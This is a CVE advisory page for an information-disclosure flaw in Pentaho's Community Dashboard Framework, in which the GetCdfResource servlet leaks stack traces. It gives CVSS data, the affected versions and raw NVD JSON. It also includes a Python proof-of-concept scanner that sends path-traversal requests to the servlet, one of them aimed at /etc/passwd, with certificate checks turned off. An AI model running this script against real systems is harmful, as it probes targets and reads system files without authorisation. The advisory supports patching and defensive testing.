Security Vulnerability Report
CVE-2025-9122 CVSS 5.3 MEDIUM

CVE-2025-9122

Published: 2025-12-15 23:15:58
Last Modified: 2026-04-15 00:35:42

Description

Hitachi Vantara Pentaho Data Integration and Analytics Community Dashboard Framework prior to version 10.2.0.4 (including 9.3.0.x and 8.3.x) displays the full server stack trace when it encounters an error within the GetCdfResource servlet.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No NVD configuration data available; the affected versions listed below follow the description.

Pentaho Community Dashboard Framework < 8.3.x
Pentaho Community Dashboard Framework 9.3.0.x
Pentaho Community Dashboard Framework >= 9.3.0.x and < 10.2.0.4
Pentaho Data Integration and Analytics < 10.2.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-9122 PoC - Information Disclosure in GetCdfResource servlet
# Target: Hitachi Vantara Pentaho Community Dashboard Framework


def exploit(target_url):
    """
    Exploit script to trigger error disclosure in GetCdfResource servlet
    """
    endpoints = [
        "/pentaho/content/common-ui/resources/web/../../../GetCdfResource",
        "/pentaho/api/repositories/GetCdfResource",
        "/pentaho/plugin/GetCdfResource?resource=/../../../invalid",
        "/pentaho/content/pentaho-cdf-dd/GetCdfResource?path=../../../../etc/passwd"
    ]

    print(f"[*] Testing target: {target_url}")
    print("[*] CVE-2025-9122 - Information Disclosure in GetCdfResource\n")

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            print(f"[+] Testing: {endpoint}")
            # verify=False disables TLS certificate validation for the request
            response = requests.get(url, timeout=10, verify=False)

            # Check for stack trace indicators
            if any(indicator in response.text for indicator in [
                'java.lang.', 'at java.', 'Exception', 'Stacktrace',
                'at org.pentaho', 'at com.pentaho', '.java:'
            ]):
                print("[!] VULNERABLE - Stack trace detected!")
                print(f"[+] Response length: {len(response.text)} bytes")

                # Extract first 500 chars of stack trace
                if 'java.lang' in response.text:
                    start = response.text.find('java.lang')
                    print(f"[+] Stack trace snippet:\n{response.text[start:start + 500]}")
                return True
            else:
                print("[-] No information disclosure detected")
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")

    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/pentaho")
        sys.exit(1)
    exploit(sys.argv[1])
```

References

https://support.pentaho.com/hc/en-us/articles/41833799577741--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Generation-of-Error-Message-Containing-Sensitive-Information-Versions-before-10-2-0-4-Impacted-CVE-2025-9122 (vendor advisory, per the NVD record below)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-9122",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T23:15:57.737",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Hitachi Vantara Pentaho Data Integration and Analytics Community Dashboard Framework prior to versions 10.2.0.4, including 9.3.0.x and 8.3.x display the full server stack trace when encountering an error within the GetCdfResource servlet."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-209"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.pentaho.com/hc/en-us/articles/41833799577741--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Generation-of-Error-Message-Containing-Sensitive-Information-Versions-before-10-2-0-4-Impacted-CVE-2025-9122",
        "source": "[email protected]"
      }
    ]
  }
}
```